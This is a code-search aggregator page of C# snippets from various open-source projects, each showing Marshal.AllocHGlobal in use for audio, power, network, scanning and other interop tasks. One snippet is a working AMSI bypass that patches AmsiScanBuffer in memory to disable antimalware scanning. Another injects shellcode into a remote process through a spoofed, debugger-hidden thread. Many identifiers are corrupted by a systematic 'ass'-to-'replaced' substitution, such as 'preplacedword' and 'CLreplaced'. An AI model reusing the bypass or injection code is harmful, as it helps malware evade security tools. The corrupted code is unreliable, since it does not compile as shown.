                var toc = new TimeSpan(DateTime.Now.Ticks);
                if (toc.Subtract(tic).Duration().Milliseconds >= freq)
                {
                    tic = new TimeSpan(DateTime.Now.Ticks);
                    _audioRawDataManager.PullAudioFrame(buffer, (int) type, samples, bytesPerSample, channels,
                        samplesPerSec, 0, avsync_type);

                    var byteArray = new byte[samples * bytesPerSample];
                    Marshal.Copy(buffer, byteArray, 0, samples * bytesPerSample);

                    var floatArray = ConvertByteToFloat16(byteArray);
                    lock (audioBuffer)
                    {
                        audioBuffer.Put(floatArray);
                    }

                    writeCount += floatArray.Length;
                    count += 1;
                }

                if (count == 100)
                {
                    _startSignal = true;
                }
            }

            Marshal.FreeHGlobal(buffer);
        }

19 View Source File : PowerManager.cs
License : MIT License
Project Creator : ABTSoftware

private Guid GetActiveGuid()
        {
            Guid ActiveScheme = Guid.Empty;
            IntPtr ptr = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(IntPtr)));
            if (PowerGetActiveScheme((IntPtr)null, out ptr) == 0)
            {
                ActiveScheme = (Guid)Marshal.PtrToStructure(ptr, typeof(Guid));
                if (ptr != null)
                {
                    Marshal.FreeHGlobal(ptr);
                }
            }
            return ActiveScheme;
        }

19 View Source File : TcpEngine.cs
License : GNU General Public License v3.0
Project Creator : aiportal

private static IEnumerable<MIB_TCPROW_OWNER_PID> EnumTcpConnectionsV4()
		{
			int dwSize = sizeof(int) + Marshal.SizeOf(typeof(MIB_TCPROW_OWNER_PID)) * 100;
			IntPtr hTcpTable = IntPtr.Zero;
			{
				hTcpTable = Marshal.AllocHGlobal(dwSize);
				int ret = iphlpapi.GetExtendedTcpTable(hTcpTable, ref dwSize, true, util.AF_INET, TCP_TABLE_CLreplaced.TCP_TABLE_OWNER_PID_CONNECTIONS, 0);
				if (ret != util.NO_ERROR)
				{
					// retry for new dwSize.
					Marshal.FreeHGlobal(hTcpTable);
					hTcpTable = Marshal.AllocHGlobal(dwSize);
					ret = iphlpapi.GetExtendedTcpTable(hTcpTable, ref dwSize, true, util.AF_INET, TCP_TABLE_CLreplaced.TCP_TABLE_OWNER_PID_CONNECTIONS, 0);
					if (ret != util.NO_ERROR)
					{
						Marshal.FreeHGlobal(hTcpTable);
						throw new Exception("GetExtendedTcpTable return: " + ret);
					}
				}
			}
			{
				MIB_TCPROW_OWNER_PID item = new MIB_TCPROW_OWNER_PID();
				int dwNumEntries = Marshal.ReadInt32(hTcpTable);
				IntPtr pItem = new IntPtr(hTcpTable.ToInt32() + sizeof(int));
				for (int i = 0; i < dwNumEntries; ++i)
				{
					//var item = (MIB_TCPROW_OWNER_PID)Marshal.PtrToStructure(pItem, typeof(MIB_TCPROW_OWNER_PID));
					Marshal.PtrToStructure(pItem, item);
					pItem = new IntPtr(pItem.ToInt64() + Marshal.SizeOf(typeof(MIB_TCPROW_OWNER_PID)));
					yield return item;
				}
				Marshal.FreeHGlobal(hTcpTable);
			}
		}

19 View Source File : UacHelper.cs
License : GNU General Public License v3.0
Project Creator : AaronKelley

public static bool IsProcessElevated()
        {
            if (IsUacEnabled())
            {
                if (!OpenProcessToken(Process.GetCurrentProcess().Handle, TOKEN_READ, out IntPtr tokenHandle))
                {
                    throw new ApplicationException("Could not get process token.  Win32 Error Code: " + Marshal.GetLastWin32Error());
                }

                try
                {
                    TokenElevationType elevationResult = TokenElevationType.TokenElevationTypeDefault;

                    int elevationResultSize = Marshal.SizeOf(Enum.GetUnderlyingType(elevationResult.GetType()));
                    uint returnedSize = 0;

                    IntPtr elevationTypePtr = Marshal.AllocHGlobal(elevationResultSize);
                    try
                    {
                        bool success = GetTokenInformation(tokenHandle, TokenInformationClreplaced.TokenElevationType, elevationTypePtr, (uint)elevationResultSize, out returnedSize);
                        if (success)
                        {
                            elevationResult = (TokenElevationType)Marshal.ReadInt32(elevationTypePtr);
                            bool isProcessAdmin = elevationResult == TokenElevationType.TokenElevationTypeFull;
                            return isProcessAdmin;
                        }
                        else
                        {
                            throw new ApplicationException("Unable to determine the current elevation.");
                        }
                    }
                    finally
                    {
                        if (elevationTypePtr != IntPtr.Zero)
                        {
                            Marshal.FreeHGlobal(elevationTypePtr);
                        }
                    }
                }
                finally
                {
                    if (tokenHandle != IntPtr.Zero)
                    {
                        CloseHandle(tokenHandle);
                    }
                }
            }
            else
            {
                WindowsIdenreplacedy idenreplacedy = WindowsIdenreplacedy.GetCurrent();
                WindowsPrincipal principal = new(idenreplacedy);
                bool result = principal.IsInRole(WindowsBuiltInRole.Administrator) || principal.IsInRole(0x200); // 0x200 = Domain Administrator
                return result;
            }
        }

19 View Source File : CustomScanner.cs
License : Apache License 2.0
Project Creator : airbus-cert

public virtual List<ScanResult> ScanMemory(
            ref byte[] buffer,
            int length,
            ExternalVariables externalVariables,
            YR_SCAN_FLAGS flags)
        {
            YR_CALLBACK_FUNC scannerCallback = new YR_CALLBACK_FUNC(HandleMessage);
            List<ScanResult> scanResults = new List<ScanResult>();
            GCHandleHandler resultsHandle = new GCHandleHandler(scanResults);
            Methods.yr_scanner_set_callback(customScannerPtr, scannerCallback, resultsHandle.GetPointer());

            SetFlags(flags);
            SetExternalVariables(externalVariables);

            IntPtr btCpy = Marshal.AllocHGlobal(buffer.Length); ;
            Marshal.Copy(buffer, 0, btCpy, (int)buffer.Length);

            ErrorUtility.ThrowOnError(
                Methods.yr_scanner_scan_mem(
                    customScannerPtr,
                    btCpy,
                    (ulong)length
                    ));

            ClearExternalVariables(externalVariables);

            return scanResults;
        }

19 View Source File : FileHandle.cs
License : MIT License
Project Creator : action-bi-toolkit

private static string GetNameFromHandle(SafeGenericHandle handle)
        {
            uint length;

            NativeMethods.NtQueryObject(
                handle,
                OBJECT_INFORMATION_CLreplaced.ObjectNameInformation,
                IntPtr.Zero, 0, out length);
            IntPtr ptr = IntPtr.Zero;
            try
            {
                try { }
                finally
                {
                    ptr = Marshal.AllocHGlobal((int)length);
                }

                if (NativeMethods.NtQueryObject(
                    handle,
                    OBJECT_INFORMATION_CLreplaced.ObjectNameInformation,
                    ptr, length, out length) != NTSTATUS.STATUS_SUCCESS)
                {
                    return null;
                }

                var unicodeStringName = (UNICODE_STRING)Marshal.PtrToStructure(ptr, typeof(UNICODE_STRING));
                return unicodeStringName.ToString();
            }
            finally
            {
                Marshal.FreeHGlobal(ptr);
            }
        }

19 View Source File : Program.cs
License : BSD 3-Clause "New" or "Revised" License
Project Creator : airzero24

private static int GetParentProcess(IntPtr Handle)
        {
            var basicProcessInformation = new PROCESS_BASIC_INFORMATION();
            IntPtr pProcInfo = Marshal.AllocHGlobal(Marshal.SizeOf(basicProcessInformation));
            Marshal.StructureToPtr(basicProcessInformation, pProcInfo, true);
            NtQueryInformationProcess(Handle, PROCESSINFOCLreplaced.ProcessBasicInformation, pProcInfo, Marshal.SizeOf(basicProcessInformation), out int returnLength);
            basicProcessInformation = (PROCESS_BASIC_INFORMATION)Marshal.PtrToStructure(pProcInfo, typeof(PROCESS_BASIC_INFORMATION));

            return basicProcessInformation.InheritedFromUniqueProcessId;
        }

19 View Source File : MetadataCustomMarshaler.cs
License : MIT License
Project Creator : 0xC0000054

public IntPtr MarshalManagedToNative(object ManagedObj)
        {
            if (ManagedObj == null)
            {
                return IntPtr.Zero;
            }

            WebPNative.MetadataParams metadata = (WebPNative.MetadataParams)ManagedObj;

            IntPtr nativeStructure = Marshal.AllocHGlobal(NativeMetadataParamsSize);

            unsafe
            {
                NativeMetadataParams* nativeMetadata = (NativeMetadataParams*)nativeStructure;

                if (metadata.iccProfile != null && metadata.iccProfile.Length > 0)
                {
                    nativeMetadata->iccProfile = Marshal.AllocHGlobal(metadata.iccProfile.Length);
                    Marshal.Copy(metadata.iccProfile, 0, nativeMetadata->iccProfile, metadata.iccProfile.Length);
                    nativeMetadata->iccProfileSize = new UIntPtr((uint)metadata.iccProfile.Length);
                }
                else
                {
                    nativeMetadata->iccProfile = IntPtr.Zero;
                    nativeMetadata->iccProfileSize = UIntPtr.Zero;
                }

                if (metadata.exif != null && metadata.exif.Length > 0)
                {
                    nativeMetadata->exif = Marshal.AllocHGlobal(metadata.exif.Length);
                    Marshal.Copy(metadata.exif, 0, nativeMetadata->exif, metadata.exif.Length);
                    nativeMetadata->exifSize = new UIntPtr((uint)metadata.exif.Length);
                }
                else
                {
                    nativeMetadata->exif = IntPtr.Zero;
                    nativeMetadata->exifSize = UIntPtr.Zero;
                }

                if (metadata.xmp != null && metadata.xmp.Length > 0)
                {
                    nativeMetadata->xmp = Marshal.AllocHGlobal(metadata.xmp.Length);
                    Marshal.Copy(metadata.xmp, 0, nativeMetadata->xmp, metadata.xmp.Length);
                    nativeMetadata->xmpSize = new UIntPtr((uint)metadata.xmp.Length);
                }
                else
                {
                    nativeMetadata->xmp = IntPtr.Zero;
                    nativeMetadata->xmpSize = UIntPtr.Zero;
                }
            }

            return nativeStructure;
        }

19 View Source File : CreateThread.cs
License : MIT License
Project Creator : Akaion

public void CallFunction(CallDescriptor callDescriptor)
        {
            // Write the shellcode used to perform the function call into a buffer

            var shellcode = replacedembleShellcode(callDescriptor);

            var shellcodeBuffer = _memory.AllocateBlock(IntPtr.Zero, shellcode.Length, ProtectionType.ReadWrite);

            _memory.WriteBlock(shellcodeBuffer, shellcode);

            _memory.ProtectBlock(shellcodeBuffer, shellcode.Length, ProtectionType.ExecuteRead);

            // Create a suspended thread with a spoofed start address

            var ntStatus = Ntdll.NtCreateThreadEx(out var threadHandle, AccessMask.SpecificRightsAll | AccessMask.StandardRightsAll, IntPtr.Zero, _process.SafeHandle, _process.MainModule.BaseAddress, IntPtr.Zero, ThreadCreationFlags.CreateSuspended | ThreadCreationFlags.HideFromDebugger, 0, 0, 0, IntPtr.Zero);

            if (ntStatus != NtStatus.Success)
            {
                throw new Win32Exception($"Failed to call NtCreateThreadEx with error code {ntStatus}");
            }

            if (callDescriptor.IsWow64Call)
            {
                // Get the context of the thread

                var threadContext = new Wow64Context {ContextFlags = Wow64ContextFlags.Integer};

                if (!Kernel32.Wow64GetThreadContext(threadHandle, ref threadContext))
                {
                    throw new Win32Exception($"Failed to call Wow64GetThreadContext with error code {Marshal.GetLastWin32Error()}");
                }

                // Change the spoofed start address to the address of the shellcode

                threadContext.Eax = (int) shellcodeBuffer;

                // Update the context of the thread

                if (!Kernel32.Wow64SetThreadContext(threadHandle, ref threadContext))
                {
                    throw new Win32Exception($"Failed to call Wow64GetThreadContext with error code {Marshal.GetLastWin32Error()}");
                }
            }

            else
            {
                // Get the context of the thread

                var threadContext = new Context {ContextFlags = ContextFlags.Integer};

                var threadContextBuffer = Marshal.AllocHGlobal(Unsafe.SizeOf<Context>());

                Marshal.StructureToPtr(threadContext, threadContextBuffer, false);

                if (!Kernel32.GetThreadContext(threadHandle, threadContextBuffer))
                {
                    throw new Win32Exception($"Failed to call GetThreadContext with error code {Marshal.GetLastWin32Error()}");
                }

                threadContext = Marshal.PtrToStructure<Context>(threadContextBuffer);

                // Change the spoofed start address to the address of the shellcode

                threadContext.Rcx = (long) shellcodeBuffer;

                Marshal.StructureToPtr(threadContext, threadContextBuffer, false);

                // Update the context of the thread

                if (!Kernel32.SetThreadContext(threadHandle, threadContextBuffer))
                {
                    throw new Win32Exception($"Failed to call SetThreadContext with error code {Marshal.GetLastWin32Error()}");
                }

                Marshal.FreeHGlobal(threadContextBuffer);
            }

            // Resume the thread

            if (Kernel32.ResumeThread(threadHandle) == -1)
            {
                throw new Win32Exception($"Failed to call ResumeThread with error code {Marshal.GetLastWin32Error()}");
            }

            if (Kernel32.WaitForSingleObject(threadHandle, int.MaxValue) == -1)
            {
                throw new Win32Exception($"Failed to call WaitForSingleObject with error code {Marshal.GetLastWin32Error()}");
            }

            threadHandle.Dispose();

            _memory.FreeBlock(shellcodeBuffer);
        }

19 View Source File : SystemUtility.cs
License : MIT License
Project Creator : action-bi-toolkit

public static IEnumerable<FileHandle> GetHandles(int[] processIds)
        {
            var longProcIds = processIds.Select(Convert.ToUInt64).OrderBy(x => x).ToArray();
            uint length = 0x10000;
            IntPtr ptr = IntPtr.Zero;
            try
            {
                try { }
                finally
                {
                    ptr = Marshal.AllocHGlobal((int)length);
                }


                uint returnLength;
                NTSTATUS result;
                while ((result = NativeMethods.NtQuerySystemInformation(
                    SYSTEM_INFORMATION_CLreplaced.SystemHandleInformation, ptr, length, out returnLength)) ==
                       NTSTATUS.STATUS_INFO_LENGTH_MISMATCH)
                {
                    length = ((returnLength + 0xffff) & ~(uint)0xffff);
                    try { }
                    finally
                    {
                        Marshal.FreeHGlobal(ptr);
                        ptr = Marshal.AllocHGlobal((int)length);
                    }
                }

                if (result != NTSTATUS.STATUS_SUCCESS)
                    yield break;

                long handleCount = Marshal.ReadInt64(ptr);
                int offset = sizeof(long) + sizeof(long);
                int size = Marshal.SizeOf(typeof(SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX));
                for (int i = 0; i < handleCount; i++)
                {
                    var handleEntry =
                        (SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX)Marshal.PtrToStructure(
                        IntPtr.Add(ptr, offset), typeof(SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX));

                    if (Array.BinarySearch(longProcIds, handleEntry.UniqueProcessId) > -1 
                        && FileHandle.TryCreate(handleEntry.UniqueProcessId, handleEntry.HandleValue, handleEntry.ObjectTypeIndex, out var fileHandle))
                    {
                        yield return fileHandle;
                    }

                    offset += size;
                }
            }
            finally
            {
                if (ptr != IntPtr.Zero)
                    Marshal.FreeHGlobal(ptr);
            }
        }

19 View Source File : MemoryManager.cs
License : MIT License
Project Creator : Akaion

internal TStructure ReadVirtualMemory<TStructure>(IntPtr baseAddress) where TStructure : struct
        {
            var structureSize = Marshal.SizeOf<TStructure>();
            
            var structureBuffer = Marshal.AllocHGlobal(structureSize);

            if (!ReadProcessMemory(_processHandle, baseAddress, structureBuffer, structureSize, IntPtr.Zero))
            {
                ExceptionHandler.ThrowWin32Exception("Failed to read from a region of virtual memory in the remote process");
            }

            try
            {
                return Marshal.PtrToStructure<TStructure>(structureBuffer);
            }

            finally
            {
                Marshal.FreeHGlobal(structureBuffer);
            }
        }

19 View Source File : DellSmbiosSmi.cs
License : GNU General Public License v3.0
Project Creator : AaronKelley

private static uint? GetSecurityKeyNew(SmiPreplacedword which, string preplacedword, PreplacedwordProperties properties)
        {
            // NOTE – Non-functional, need to figure out the string pointer before it will work.

            if (GetPreplacedwordFormat(which, properties) == SmiPreplacedwordFormat.Scancode)
            {
                throw new NotImplementedException("BIOS wants scancode-encoded preplacedwords, but only ASCII-encoded preplacedwords are supported at this time.");
            }

            SmiObject message = new SmiObject
            {
                Clreplaced = (Clreplaced)which,
                Selector = Selector.VerifyPreplacedwordNew
            };

            // Allocate a buffer for the preplacedword.
            int bufferSize = properties.MaximumLength * 2;
            IntPtr buffer = Marshal.AllocHGlobal(bufferSize);

            // Zero out the buffer.
            for (byte index = 0; index < bufferSize; index++)
            {
                Marshal.WriteByte(buffer, index, 0);
            }

            // Copy preplacedword into the buffer (ASCII-encoded).
            byte[] preplacedwordBytes = ASCIIEncoding.ASCII.GetBytes(preplacedword);
            Marshal.Copy(preplacedwordBytes, 0, buffer, Math.Min(preplacedword.Length, bufferSize));

            message.Input1 = (uint)buffer.ToInt32();

            ExecuteCommand(ref message);

            Marshal.FreeHGlobal(buffer);

            if (message.Input1 == (uint)SmiPreplacedwordCheckResult.Correct)
            {
                return message.Input2;
            }
            else
            {
                return null;
            }
        }

19 View Source File : MidiFIlePlot.cs
License : GNU Affero General Public License v3.0
Project Creator : akira0245

private static unsafe T* Alloc<T>() where T : unmanaged
    {
        var allocHGlobal = (T*)Marshal.AllocHGlobal(sizeof(T));
        *allocHGlobal = new T();
        return allocHGlobal;
    }

19 View Source File : NativeMethods.cs
License : GNU General Public License v2.0
Project Creator : ADeltaX

public static void _SendMessage(string msg, IntPtr target)
		{
			byte[] b = Encoding.UTF8.GetBytes(msg);
			IntPtr hLog = Marshal.AllocHGlobal(b.Length);
			Marshal.Copy(b, 0, hLog, b.Length);
			COPYDATASTRUCT data = new COPYDATASTRUCT();
			data.cbData = b.Length;
			data.lpData = hLog;
			SendMessage(target, WM_COPYDATA, 0, ref data);
		}

19 View Source File : UntypedBuffer.cs
License : MIT License
Project Creator : Alan-FGR

private static (IntPtr unaligned, IntPtr aligned) AlignedAlloc(int size)
    {
        var unaligned = Marshal.AllocHGlobal(size + 8);
        long snappedPtr = (((long)unaligned + 15) / 16) * 16;
        var aligned = (IntPtr)snappedPtr;
        return (unaligned, aligned);
    }

19 View Source File : Class1.cs
License : GNU General Public License v3.0
Project Creator : 0xB455

public static int Patch()
        {
            //Get pointer for the amsi.dll        
            IntPtr TargetDLL = LoadLibrary("amsi.dll");
            if (TargetDLL == IntPtr.Zero)
            {
                Console.WriteLine("ERROR: Could not retrieve amsi.dll pointer!");
                return 1;
            }

            //Get pointer for the AmsiScanBuffer function
            IntPtr AmsiScanBufrPtr = GetProcAddress(TargetDLL, "AmsiScanBuffer");
            if (AmsiScanBufrPtr == IntPtr.Zero)
            {
                Console.WriteLine("ERROR: Could not retrieve AmsiScanBuffer function pointer!");
                return 1;
            }

            /*
             *  Apply memory patching as described by Cyberark here:          
             *  https://www.cyberark.com/threat-research-blog/amsi-bypreplaced-redux/
             */
            UIntPtr dwSize = (UIntPtr)4;
            uint Zero = 0;

            //Pointer changing the AmsiScanBuffer memory protection from readable only to writeable (0x40)
            if (!VirtualProtect(AmsiScanBufPtr, dwSize, 0x40, out Zero))
            {
                Console.WriteLine("ERROR: Could not modify AmsiScanBuffer memory permissions!");
                return 1;
            }

            Byte[] Patch = { 0x31, 0xff, 0x90 }; //The new patch opcode

            //Setting a pointer to the patch opcode array (unmanagedPointer)
            IntPtr unmanagedPointer = Marshal.AllocHGlobal(3);
            Marshal.Copy(Patch, 0, unmanagedPointer, 3);

            //Patching the relevant line (the line which submits the rd8 to the edi register) with the xor edi,edi opcode
            MoveMemory(AmsiScanBufrPtr + 0x001b, unmanagedPointer, 3); 

            Console.WriteLine("Great success. AmsiScanBuffer patched! :)");
            return 0;
        }

19 View Source File : StructHelper.cs
License : MIT License
Project Creator : albyho

public static T BytesToStuct<T>(byte[] bytes, Int32 offset) where T : struct
        {
            Type type = typeof(T);
            //得到结构体的大小
            Int32 size = Marshal.SizeOf(type);
            //byte数组长度小于结构体的大小
            if (size > bytes.Length - offset)
            {
                throw new ArgumentException("bytes 的长度不足", nameof(bytes));
                //返回空
                //return default(T);
            }
            //分配结构体大小的内存空间
            IntPtr structPtr = Marshal.AllocHGlobal(size);
            //将byte数组拷到分配好的内存空间
            Marshal.Copy(bytes, offset, structPtr, size);
            //将内存空间转换为目标结构体
            object obj = Marshal.PtrToStructure(structPtr, type);
            //释放内存空间
            Marshal.FreeHGlobal(structPtr);
            //返回结构体
            return (T)obj;
        }

19 View Source File : DarksVMDataInitializer.cs
License : GNU General Public License v3.0
Project Creator : Aekras1a

private static void* AllocateKoi(void* ptr, uint len)
        {
            var koi = (void*) Marshal.AllocHGlobal((int) len);
            CopyMemory(koi, ptr, len);
            return koi;
        }

19 View Source File : DellSmbiosSmi.cs
License : GNU General Public License v3.0
Project Creator : AaronKelley

private static SmiObject ByteArrayToStruct(byte[] array)
        {
            SmiObject message = new SmiObject();

            int size = Marshal.SizeOf(message);
            IntPtr pointer = Marshal.AllocHGlobal(size);

            Marshal.Copy(array, 0, pointer, size);

            message = (SmiObject)Marshal.PtrToStructure(pointer, message.GetType());
            Marshal.FreeHGlobal(pointer);

            return message;
        }

19 View Source File : PInvokeHooks.cs
License : zlib License
Project Creator : 0x0ade

public static void CallHooks(Messages Msg, IntPtr wParam, Message lParamMsg, bool global = true, bool window = true, bool allWindows = false) {
            IntPtr lParam = Marshal.AllocHGlobal(MessageSize);
            Marshal.StructureToPtr(lParamMsg, lParam, false);
            CallHooks(Msg, wParam, lParam, lParamMsg: ref lParamMsg, global: global, window: window, allWindows: allWindows);
            Marshal.FreeHGlobal(lParam);
        }

19 View Source File : MetadataCustomMarshaler.cs
License : MIT License
Project Creator : 0xC0000054

public IntPtr MarshalManagedToNative(object ManagedObj)
        {
            if (ManagedObj == null)
            {
                return IntPtr.Zero;
            }

            WebPNative.MetadataParams metadata = (WebPNative.MetadataParams)ManagedObj;

            IntPtr nativeStructure = Marshal.AllocHGlobal(NativeMetadataParamsSize);

            unsafe
            {
                NativeMetadataParams* nativeMetadata = (NativeMetadataParams*)nativeStructure;

                if (metadata.iccProfile != null && metadata.iccProfile.Length > 0)
                {
                    nativeMetadata->iccProfile = Marshal.AllocHGlobal(metadata.iccProfile.Length);
                    Marshal.Copy(metadata.iccProfile, 0, nativeMetadata->iccProfile, metadata.iccProfile.Length);
                    nativeMetadata->iccProfileSize = new UIntPtr((uint)metadata.iccProfile.Length);
                }
                else
                {
                    nativeMetadata->iccProfile = IntPtr.Zero;
                    nativeMetadata->iccProfileSize = UIntPtr.Zero;
                }

                if (metadata.exif != null && metadata.exif.Length > 0)
                {
                    nativeMetadata->exif = Marshal.AllocHGlobal(metadata.exif.Length);
                    Marshal.Copy(metadata.exif, 0, nativeMetadata->exif, metadata.exif.Length);
                    nativeMetadata->exifSize = new UIntPtr((uint)metadata.exif.Length);
                }
                else
                {
                    nativeMetadata->exif = IntPtr.Zero;
                    nativeMetadata->exifSize = UIntPtr.Zero;
                }

                if (metadata.xmp != null && metadata.xmp.Length > 0)
                {
                    nativeMetadata->xmp = Marshal.AllocHGlobal(metadata.xmp.Length);
                    Marshal.Copy(metadata.xmp, 0, nativeMetadata->xmp, metadata.xmp.Length);
                    nativeMetadata->xmpSize = new UIntPtr((uint)metadata.xmp.Length);
                }
                else
                {
                    nativeMetadata->xmp = IntPtr.Zero;
                    nativeMetadata->xmpSize = UIntPtr.Zero;
                }
            }

            return nativeStructure;
        }

19 View Source File : WaveFormat.cs
License : MIT License
Project Creator : 3wz

public static IntPtr MarshalToPtr(WaveFormat format)
        {
            int formatSize = Marshal.SizeOf(format);
            IntPtr formatPointer = Marshal.AllocHGlobal(formatSize);
            Marshal.StructureToPtr(format, formatPointer, false);            
            return formatPointer;
        }

19 View Source File : OVRNetwork.cs
License : MIT License
Project Creator : absurd-joy

public static FrameHeader FromBytes(byte[] arr)
		{
			FrameHeader header = new FrameHeader();

			int size = Marshal.SizeOf(header);
			Trace.replacedert(size == StructSize);

			IntPtr ptr = Marshal.AllocHGlobal(size);

			Marshal.Copy(arr, 0, ptr, size);

			header = (FrameHeader)Marshal.PtrToStructure(ptr, header.GetType());
			Marshal.FreeHGlobal(ptr);

			return header;
		}

19 View Source File : RawInputWnd.cs
License : GNU General Public License v3.0
Project Creator : aiportal

private void GetRawInputData(IntPtr hRawInput)
		{
			try
			{
				int bsCount = -1;
				int blen = 0;
				int hlen = Marshal.SizeOf(typeof(RAWINPUTHEADER));

				//TraceLogger.Instance.WriteLineInfo("Get RawInput data.");
				bsCount = user32.GetRawInputData(hRawInput, RawInputCommand.Input, IntPtr.Zero, ref blen, hlen);
				if ((bsCount == -1) || (blen < 1))
				{ throw new Win32Exception(Marshal.GetLastWin32Error(), "GetRawInputData Error Retreiving Buffer size."); }
				else
				{
					IntPtr pBuffer = Marshal.AllocHGlobal(blen);
					try
					{
						bsCount = user32.GetRawInputData(hRawInput, RawInputCommand.Input, pBuffer, ref blen, hlen);
						if (bsCount != blen)
						{ throw new Win32Exception(Marshal.GetLastWin32Error(), "GetRawInputData Error Retreiving Buffer data."); }
						else
						{
							RawInput ri = (RawInput)Marshal.PtrToStructure(pBuffer, typeof(RawInput));
							FireRawInputEvent(ref ri);
						}
					}
					catch (Exception ex) { TraceLogger.Instance.WriteException(ex); }
					finally
					{
						Marshal.FreeHGlobal(pBuffer);
					}
				}
			}
			catch (Exception ex) { TraceLogger.Instance.WriteException(ex); }
		}

See More Examples